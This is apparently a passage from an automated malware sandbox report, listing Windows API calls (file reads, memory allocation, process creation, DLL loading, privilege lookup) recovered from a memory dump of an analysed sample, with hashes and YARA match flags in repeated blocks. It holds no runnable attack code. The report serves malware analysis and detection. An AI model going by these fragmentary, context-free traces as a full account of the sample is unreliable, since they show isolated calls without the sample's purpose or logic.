                                                  • NtReadFile.NTDLL(04CD3D62,5E972F59,FFFFFFFF,04CD3A21,?,?,04CD3D62,?,04CD3A21,FFFFFFFF,5E972F59,04CD3D62,?,00000000), ref: 04CD82C5
                                                  Memory Dump Source
                                                  • Source File: 00000011.00000002.492524141.0000000004CC0000.00000040.00000001.sdmp, Offset: 04CC0000, based on PE: false
                                                  Yara matches
                                                  Similarity
                                                  • API ID: FileRead
                                                  • String ID:
                                                  • API String ID: 2738559852-0
                                                  • Opcode ID: d218f83dd6e9f7fe4ee4ac4d9e03152587d1c023c7b5d581cfb14b96684e8d3e
                                                  • Instruction ID: 0eef64b4eda85757618d5b41e6e43c060c045ccd0a07c3feabe7b1dae7414ca1
                                                  • Opcode Fuzzy Hash: d218f83dd6e9f7fe4ee4ac4d9e03152587d1c023c7b5d581cfb14b96684e8d3e
                                                  • Instruction Fuzzy Hash: 17F0F4B2200209AFCB14DF88DC90EEB77A9AF8C314F158649FA5D97241C670EC11CBA0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • NtReadFile.NTDLL(04CD3D62,5E972F59,FFFFFFFF,04CD3A21,?,?,04CD3D62,?,04CD3A21,FFFFFFFF,5E972F59,04CD3D62,?,00000000), ref: 04CD82C5
                                                  Memory Dump Source
                                                  • Source File: 00000011.00000002.492524141.0000000004CC0000.00000040.00000001.sdmp, Offset: 04CC0000, based on PE: false
                                                  Yara matches
                                                  Similarity
                                                  • API ID: FileRead
                                                  • String ID:
                                                  • API String ID: 2738559852-0
                                                  • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                  • Instruction ID: c1efec448e11188c2e3c5db83f3d808b679c2c91f3e8319a4605cb59d6aa0715
                                                  • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                  • Instruction Fuzzy Hash: 92F0A4B2200208ABDB14DF89DC80EEB77ADAF8C754F158248BA1D97241D630E8118BA0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,04CC2D11,00002000,00003000,00000004), ref: 04CD83E9
                                                  Memory Dump Source
                                                  • Source File: 00000011.00000002.492524141.0000000004CC0000.00000040.00000001.sdmp, Offset: 04CC0000, based on PE: false
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AllocateMemoryVirtual
                                                  • String ID:
                                                  • API String ID: 2167126740-0
                                                  • Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                  • Instruction ID: 86ca65043f1d8c9ceb5f730f3828c63f7fc62bcaeee02d5a42d7f91bcc1172a1
                                                  • Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                  • Instruction Fuzzy Hash: 9AF015B2200208ABDB14DF89CC80EAB77ADAF88654F118148BE1997241C630F810CBB0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • NtClose.NTDLL(04CD3D40,?,?,04CD3D40,00000000,FFFFFFFF), ref: 04CD8325
                                                  Memory Dump Source
                                                  • Source File: 00000011.00000002.492524141.0000000004CC0000.00000040.00000001.sdmp, Offset: 04CC0000, based on PE: false
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Close
                                                  • String ID:
                                                  • API String ID: 3535843008-0
                                                  • Opcode ID: e5f93ebfd0e491e38d0e4a533eda5161ba1a4ebbdeadb8b6ab030f4975ed40bb
                                                  • Instruction ID: 345e7824e08a64de40397ccb97b9b6e0d94140ad967ce334f8b219991311c881
                                                  • Opcode Fuzzy Hash: e5f93ebfd0e491e38d0e4a533eda5161ba1a4ebbdeadb8b6ab030f4975ed40bb
                                                  • Instruction Fuzzy Hash: 24E086756402047BD710EBA4CC45ED77B59DF44260F154599B95A9B241D574E500CBE0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

APIs
• NtClose.NTDLL(04CD3D40,?,?,04CD3D40,00000000,FFFFFFFF), ref: 04CD8325
Memory Dump Source
• Source File: 00000011.00000002.492524141.0000000004CC0000.00000040.00000001.sdmp, Offset: 04CC0000, based on PE: false
Similarity
• API ID: Close
• String ID:
• API String ID: 3535843008-0
Uniqueness
Uniqueness Score: -1.00%

APIs
• Sleep.KERNELBASE(000007D0), ref: 04CD6F98
Memory Dump Source
• Source File: 00000011.00000002.492524141.0000000004CC0000.00000040.00000001.sdmp, Offset: 04CC0000, based on PE: false
Similarity
• API ID: Sleep
• String ID: net.dll$wininet.dll
• API String ID: 3472027048-1269752229
Uniqueness
Uniqueness Score: -1.00%

APIs
• Sleep.KERNELBASE(000007D0), ref: 04CD6F98
Memory Dump Source
• Source File: 00000011.00000002.492524141.0000000004CC0000.00000040.00000001.sdmp, Offset: 04CC0000, based on PE: false
Similarity
• API ID: Sleep
• String ID: net.dll$wininet.dll
• API String ID: 3472027048-1269752229
Uniqueness
Uniqueness Score: -1.00%

APIs
• RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,04CC3B93), ref: 04CD850D
Memory Dump Source
• Source File: 00000011.00000002.492524141.0000000004CC0000.00000040.00000001.sdmp, Offset: 04CC0000, based on PE: false
Similarity
• API ID: FreeHeap
• String ID: .z`
• API String ID: 3298025750-1441809116
Uniqueness
Uniqueness Score: -1.00%

APIs
• RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,04CC3B93), ref: 04CD850D
Memory Dump Source
• Source File: 00000011.00000002.492524141.0000000004CC0000.00000040.00000001.sdmp, Offset: 04CC0000, based on PE: false
Similarity
• API ID: FreeHeap
• String ID: .z`
• API String ID: 3298025750-1441809116
Uniqueness
Uniqueness Score: -1.00%

APIs
• PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 04CC72CA
• PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 04CC72EB
Memory Dump Source
• Source File: 00000011.00000002.492524141.0000000004CC0000.00000040.00000001.sdmp, Offset: 04CC0000, based on PE: false
Similarity
• API ID: MessagePostThread
• String ID:
• API String ID: 1836367815-0
Uniqueness
Uniqueness Score: -1.00%

APIs
• CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,04CCCCE0,?,?), ref: 04CD705C
Memory Dump Source
• Source File: 00000011.00000002.492524141.0000000004CC0000.00000040.00000001.sdmp, Offset: 04CC0000, based on PE: false
Similarity
• API ID: CreateThread
• String ID:
• API String ID: 2422867632-0
Uniqueness
Uniqueness Score: -1.00%

APIs
• LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 04CC9BA2
Memory Dump Source
• Source File: 00000011.00000002.492524141.0000000004CC0000.00000040.00000001.sdmp, Offset: 04CC0000, based on PE: false
Similarity
• API ID: Load
• String ID:
• API String ID: 2234796835-0
Uniqueness
Uniqueness Score: -1.00%

APIs
• CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 04CD85A4
Memory Dump Source
• Source File: 00000011.00000002.492524141.0000000004CC0000.00000040.00000001.sdmp, Offset: 04CC0000, based on PE: false
Similarity
• API ID: CreateInternalProcess
• String ID:
• API String ID: 2186235152-0
Uniqueness
Uniqueness Score: -1.00%

APIs
• CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,04CCCCE0,?,?), ref: 04CD705C
Memory Dump Source
• Source File: 00000011.00000002.492524141.0000000004CC0000.00000040.00000001.sdmp, Offset: 04CC0000, based on PE: false
Similarity
• API ID: CreateThread
• String ID:
• API String ID: 2422867632-0
Uniqueness
Uniqueness Score: -1.00%

APIs
• LookupPrivilegeValueW.ADVAPI32(00000000,?,04CCCFB2,04CCCFB2,?,00000000,?,?), ref: 04CD8670
Memory Dump Source
• Source File: 00000011.00000002.492524141.0000000004CC0000.00000040.00000001.sdmp, Offset: 04CC0000, based on PE: false
Similarity
• API ID: LookupPrivilegeValue
• String ID:
• API String ID: 3899507212-0
Uniqueness
Uniqueness Score: -1.00%

APIs
• RtlAllocateHeap.NTDLL(04CD3526,?,04CD3C9F,04CD3C9F,?,04CD3526,?,?,?,?,?,00000000,00000000,?), ref: 04CD84CD
Memory Dump Source
• Source File: 00000011.00000002.492524141.0000000004CC0000.00000040.00000001.sdmp, Offset: 04CC0000, based on PE: false
Similarity
• API ID: AllocateHeap
• String ID:
• API String ID: 1279760036-0
Uniqueness
Uniqueness Score: -1.00%

APIs
• SetErrorMode.KERNELBASE(00008003,?,?,04CC7C73,?), ref: 04CCD44B
Memory Dump Source
• Source File: 00000011.00000002.492524141.0000000004CC0000.00000040.00000001.sdmp, Offset: 04CC0000, based on PE: false
Similarity
• API ID: ErrorMode
• String ID:
• API String ID: 2340568224-0
Uniqueness
Uniqueness Score: -1.00%

APIs
• LookupPrivilegeValueW.ADVAPI32(00000000,?,04CCCFB2,04CCCFB2,?,00000000,?,?), ref: 04CD8670
Memory Dump Source
• Source File: 00000011.00000002.492524141.0000000004CC0000.00000040.00000001.sdmp, Offset: 04CC0000, based on PE: false
Similarity
• API ID: LookupPrivilegeValue
• String ID:
• API String ID: 3899507212-0
Uniqueness
Uniqueness Score: -1.00%

APIs
• SetErrorMode.KERNELBASE(00008003,?,?,04CC7C73,?), ref: 04CCD44B
Memory Dump Source
• Source File: 00000011.00000002.492524141.0000000004CC0000.00000040.00000001.sdmp, Offset: 04CC0000, based on PE: false
Similarity
• API ID: ErrorMode
• String ID:
• API String ID: 2340568224-0
Uniqueness
Uniqueness Score: -1.00%

APIs
• LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 04CC9BA2
Memory Dump Source
• Source File: 00000011.00000002.492524141.0000000004CC0000.00000040.00000001.sdmp, Offset: 04CC0000, based on PE: false
Similarity
• API ID: Load
• String ID:
• API String ID: 2234796835-0
Uniqueness
Uniqueness Score: -1.00%

                                                  Non-executed Functions